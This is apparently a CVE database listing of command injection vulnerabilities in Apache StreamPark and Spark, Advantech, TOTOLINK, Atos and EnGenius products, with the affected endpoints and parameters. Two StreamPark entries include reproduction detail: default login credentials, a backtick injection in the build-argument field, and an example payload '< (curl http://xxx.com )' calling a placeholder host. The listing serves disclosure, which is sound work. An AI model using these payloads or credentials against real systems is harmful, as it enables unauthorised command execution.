Total
2967 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2024-29737 | 1 Apache | 1 Streampark | 2025-02-13 | N/A | 4.7 MEDIUM |
| In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.4 Background info: Log in to Streampark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project. Enter the git repository address of the project and input `touch /tmp/success_2.1.2` as the "Build Argument". Note that there is no verification and interception of the special character "`". As a result, you will find that this injection command will be successfully executed after executing the build. In the latest version, the special symbol ` is intercepted. | |||||
| CVE-2023-52291 | 1 Apache | 1 Streampark | 2025-02-13 | N/A | 4.7 MEDIUM |
| In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the maven build args “<” operator causes command injection. e.g : “< (curl http://xxx.com )” will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4, The "<" operator will blocked。 | |||||
| CVE-2023-32007 | 1 Apache | 1 Spark | 2025-02-13 | N/A | 8.8 HIGH |
| ** UNSUPPORTED WHEN ASSIGNED ** The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This issue was disclosed earlier as CVE-2022-33891, but incorrectly claimed version 3.1.3 (which has since gone EOL) would not be affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Users are recommended to upgrade to a supported version of Apache Spark, such as version 3.4.0. | |||||
| CVE-2023-2574 | 1 Advantech | 6 Eki-1521, Eki-1521 Firmware, Eki-1522 and 3 more | 2025-02-13 | N/A | 8.8 HIGH |
| Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the device name input field, which can be triggered by authenticated users via a crafted POST request. | |||||
| CVE-2023-2573 | 1 Advantech | 6 Eki-1521, Eki-1521 Firmware, Eki-1522 and 3 more | 2025-02-13 | N/A | 8.8 HIGH |
| Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request. | |||||
| CVE-2023-26866 | 1 Greenpacket | 4 Ot-235, Ot-235 Firmware, Wr-1200 and 1 more | 2025-02-13 | N/A | 9.8 CRITICAL |
| GreenPacket OH736's WR-1200 Indoor Unit, OT-235 with firmware versions M-IDU-1.6.0.3_V1.1 and MH-46360-2.0.3-R5-GP respectively are vulnerable to remote command injection. Commands are executed using pre-login execution and executed with root privileges allowing complete takeover. | |||||
| CVE-2024-33469 | 2025-02-13 | N/A | 7.9 HIGH | ||
| An issue in Team Amaze Amaze File Manager v.3.8.5 and fixed in v.3.10 allows a local attacker to execute arbitrary code via the onCreate method of DatabaseViewerActivity.java. | |||||
| CVE-2025-1229 | 2025-02-12 | 6.5 MEDIUM | 6.3 MEDIUM | ||
| A vulnerability classified as critical was found in olajowon Loggrove up to e428fac38cc480f011afcb1d8ce6c2bad378ddd6. Affected by this vulnerability is an unknown functionality of the file /read/?page=1&logfile=eee&match=. The manipulation of the argument path leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. | |||||
| CVE-2023-26978 | 1 Totolink | 2 A7100ru, A7100ru Firmware | 2025-02-12 | N/A | 9.8 CRITICAL |
| TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the pppoeAcName parameter at /setting/setWanIeCfg. | |||||
| CVE-2023-26848 | 1 Totolink | 2 A7100ru, A7100ru Firmware | 2025-02-12 | N/A | 9.8 CRITICAL |
| TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the org parameter at setting/delStaticDhcpRules. | |||||
| CVE-2023-29475 | 1 Atos | 2 Unify Openscape 4000, Unify Openscape 4000 Manager | 2025-02-12 | N/A | 9.8 CRITICAL |
| inventory in Atos Unify OpenScape 4000 Platform and OpenScape 4000 Manager Platform 10 R1 before 10 R1.34.4 allows an unauthenticated attacker to run arbitrary commands on the platform operating system and achieve administrative access, aka OSFOURK-23543. | |||||
| CVE-2023-29474 | 1 Atos | 2 Unify Openscape 4000, Unify Openscape 4000 Manager | 2025-02-12 | N/A | 9.8 CRITICAL |
| inventory in Atos Unify OpenScape 4000 Platform and OpenScape 4000 Manager Platform 10 R1 before 10 R1.34.4 allows an unauthenticated attacker to run arbitrary commands on the platform operating system and achieve administrative access, aka OSFOURK-23552. | |||||
| CVE-2023-29473 | 1 Atos | 2 Unify Openscape 4000, Unify Openscape 4000 Manager | 2025-02-12 | N/A | 9.8 CRITICAL |
| webservice in Atos Unify OpenScape 4000 Platform and OpenScape 4000 Manager Platform 10 R1 before 10 R1.34.4 allows an unauthenticated attacker to run arbitrary commands on the platform operating system and achieve administrative access, aka OSFOURK-23710. | |||||
| CVE-2024-11659 | 1 Engeniustech | 6 Enh1350ext, Enh1350ext Firmware, Ens500-ac and 3 more | 2025-02-12 | 5.8 MEDIUM | 4.7 MEDIUM |
| A vulnerability was found in EnGenius ENH1350EXT, ENS500-AC and ENS620EXT up to 20241118 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/network/diag_iperf. The manipulation of the argument iperf leads to command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | |||||
| CVE-2024-11657 | 1 Engeniustech | 6 Enh1350ext, Enh1350ext Firmware, Ens500-ac and 3 more | 2025-02-12 | 5.8 MEDIUM | 4.7 MEDIUM |
| A vulnerability, which was classified as critical, was found in EnGenius ENH1350EXT, ENS500-AC and ENS620EXT up to 20241118. Affected is an unknown function of the file /admin/network/diag_nslookup. The manipulation of the argument diag_nslookup leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | |||||
| CVE-2024-11655 | 1 Engeniustech | 6 Enh1350ext, Enh1350ext Firmware, Ens500-ac and 3 more | 2025-02-12 | 5.8 MEDIUM | 4.7 MEDIUM |
| A vulnerability classified as critical was found in EnGenius ENH1350EXT, ENS500-AC and ENS620EXT up to 20241118. This vulnerability affects unknown code of the file /admin/network/diag_pinginterface. The manipulation of the argument diag_ping leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | |||||
| CVE-2024-11653 | 1 Engeniustech | 6 Enh1350ext, Enh1350ext Firmware, Ens500-ac and 3 more | 2025-02-12 | 5.8 MEDIUM | 4.7 MEDIUM |
| A vulnerability was found in EnGenius ENH1350EXT, ENS500-AC and ENS620EXT up to 20241118. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/network/diag_traceroute. The manipulation of the argument diag_traceroute leads to command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | |||||
| CVE-2024-11651 | 1 Engeniustech | 6 Enh1350ext, Enh1350ext Firmware, Ens500-ac and 3 more | 2025-02-12 | 5.8 MEDIUM | 4.7 MEDIUM |
| A vulnerability was found in EnGenius ENH1350EXT, ENS500-AC and ENS620EXT up to 20241118. It has been classified as critical. Affected is an unknown function of the file /admin/network/wifi_schedule. The manipulation of the argument wifi_schedule_day_em_5 leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | |||||
| CVE-2024-11658 | 1 Engeniustech | 6 Enh1350ext, Enh1350ext Firmware, Ens500-ac and 3 more | 2025-02-12 | 5.8 MEDIUM | 4.7 MEDIUM |
| A vulnerability has been found in EnGenius ENH1350EXT, ENS500-AC and ENS620EXT up to 20241118 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/network/ajax_getChannelList. The manipulation of the argument countryCode leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | |||||
| CVE-2024-11656 | 1 Engeniustech | 6 Enh1350ext, Enh1350ext Firmware, Ens500-ac and 3 more | 2025-02-12 | 5.8 MEDIUM | 4.7 MEDIUM |
| A vulnerability, which was classified as critical, has been found in EnGenius ENH1350EXT, ENS500-AC and ENS620EXT up to 20241118. This issue affects some unknown processing of the file /admin/network/diag_ping6. The manipulation of the argument diag_ping6 leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | |||||